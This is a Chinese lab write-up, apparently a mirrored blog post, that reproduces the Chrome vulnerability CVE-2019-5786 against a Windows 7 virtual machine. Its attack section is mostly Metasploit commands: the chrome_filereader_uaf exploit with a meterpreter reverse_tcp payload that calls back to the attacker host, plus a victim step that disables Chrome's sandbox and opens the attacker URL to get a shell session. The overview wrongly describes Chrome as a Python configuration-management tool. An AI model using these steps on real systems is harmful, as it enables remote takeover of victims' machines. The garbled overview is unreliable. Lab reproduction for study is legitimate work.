zoukankan      html  css  js  c++  java
  • CVE-2019-5786漏洞利用复现

    CVE-2019-5786漏洞利用复现

    机器 系统 ip 软件

    靶机 Win7x86 192.168.31.119 Chrome_(32bit)_v72.0.3626.119

    攻击机 kali 192.168.31.92

    概述

    Chrome:是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。

    漏洞原因:由于微软在windows 7上并未实现win32k Lockdown机制,因此win7系统中的Chrome沙盒并不能充分防御win32k漏洞的利用。攻击者利用该漏洞配合一个win32k.sys的内核提权(CVE-2019-0808 )可以在win7上穿越Chrome沙箱。

    利用方法:攻击者设置监听,欺骗受害者打开或重定向到特制网页,进入会话完成攻击。

    配置靶机

    先装个x86的win7,我的版本是cn_windows_7_enterprise_x86_dvd_x15-70737.iso(难得中文版能成功)

    image-20210427161503292

    下载Chrome 链接:https://dl.lancdn.com/landian/soft/chrome/m/,搜72.0.3626.119就行

    image-20210427161525039

    之后安装chrome,没啥好说的

    攻击过程

    攻击机端进入msf控制台,输入如下指令

    use exploit/windows/browser/chrome_filereader_uaf
    set payload windows/meterpreter/reverse_tcp
    set URIPATH /
    set LHOST 192.168.31.92
    exploit
    

    image-20210427161752132

    靶机端开cmd输入C:Program FilesGoogleChromeApplication>chrome.exe --no-sandbox以沙箱关闭的状态执行chrome.exe,在地址栏输入地址http://192.168.31.92:8080

    image-20210427162009799

    攻击机这边收到了会话,输入sessions 1进入会话1攻击成功

    image-20210427162243606

    参考资料

    CVE-2019-5786漏洞复现
    CVE-2019-5786 Chrome 远程代码执行漏洞分析

  • 相关阅读:
    改写历史,永久删除git库的物理文件
    双调排序
    GitHub从无到有
    Nginx的安装与基本应用
    Django从无到有的艰苦历程
    pycharm 相关设置问题
    ORM介绍
    Django中的过滤器
    FBV和CBV的差异
    django中models field详解
  • 原文地址:https://www.cnblogs.com/Ziggy29/p/14709579.html
Copyright © 2011-2022 走看看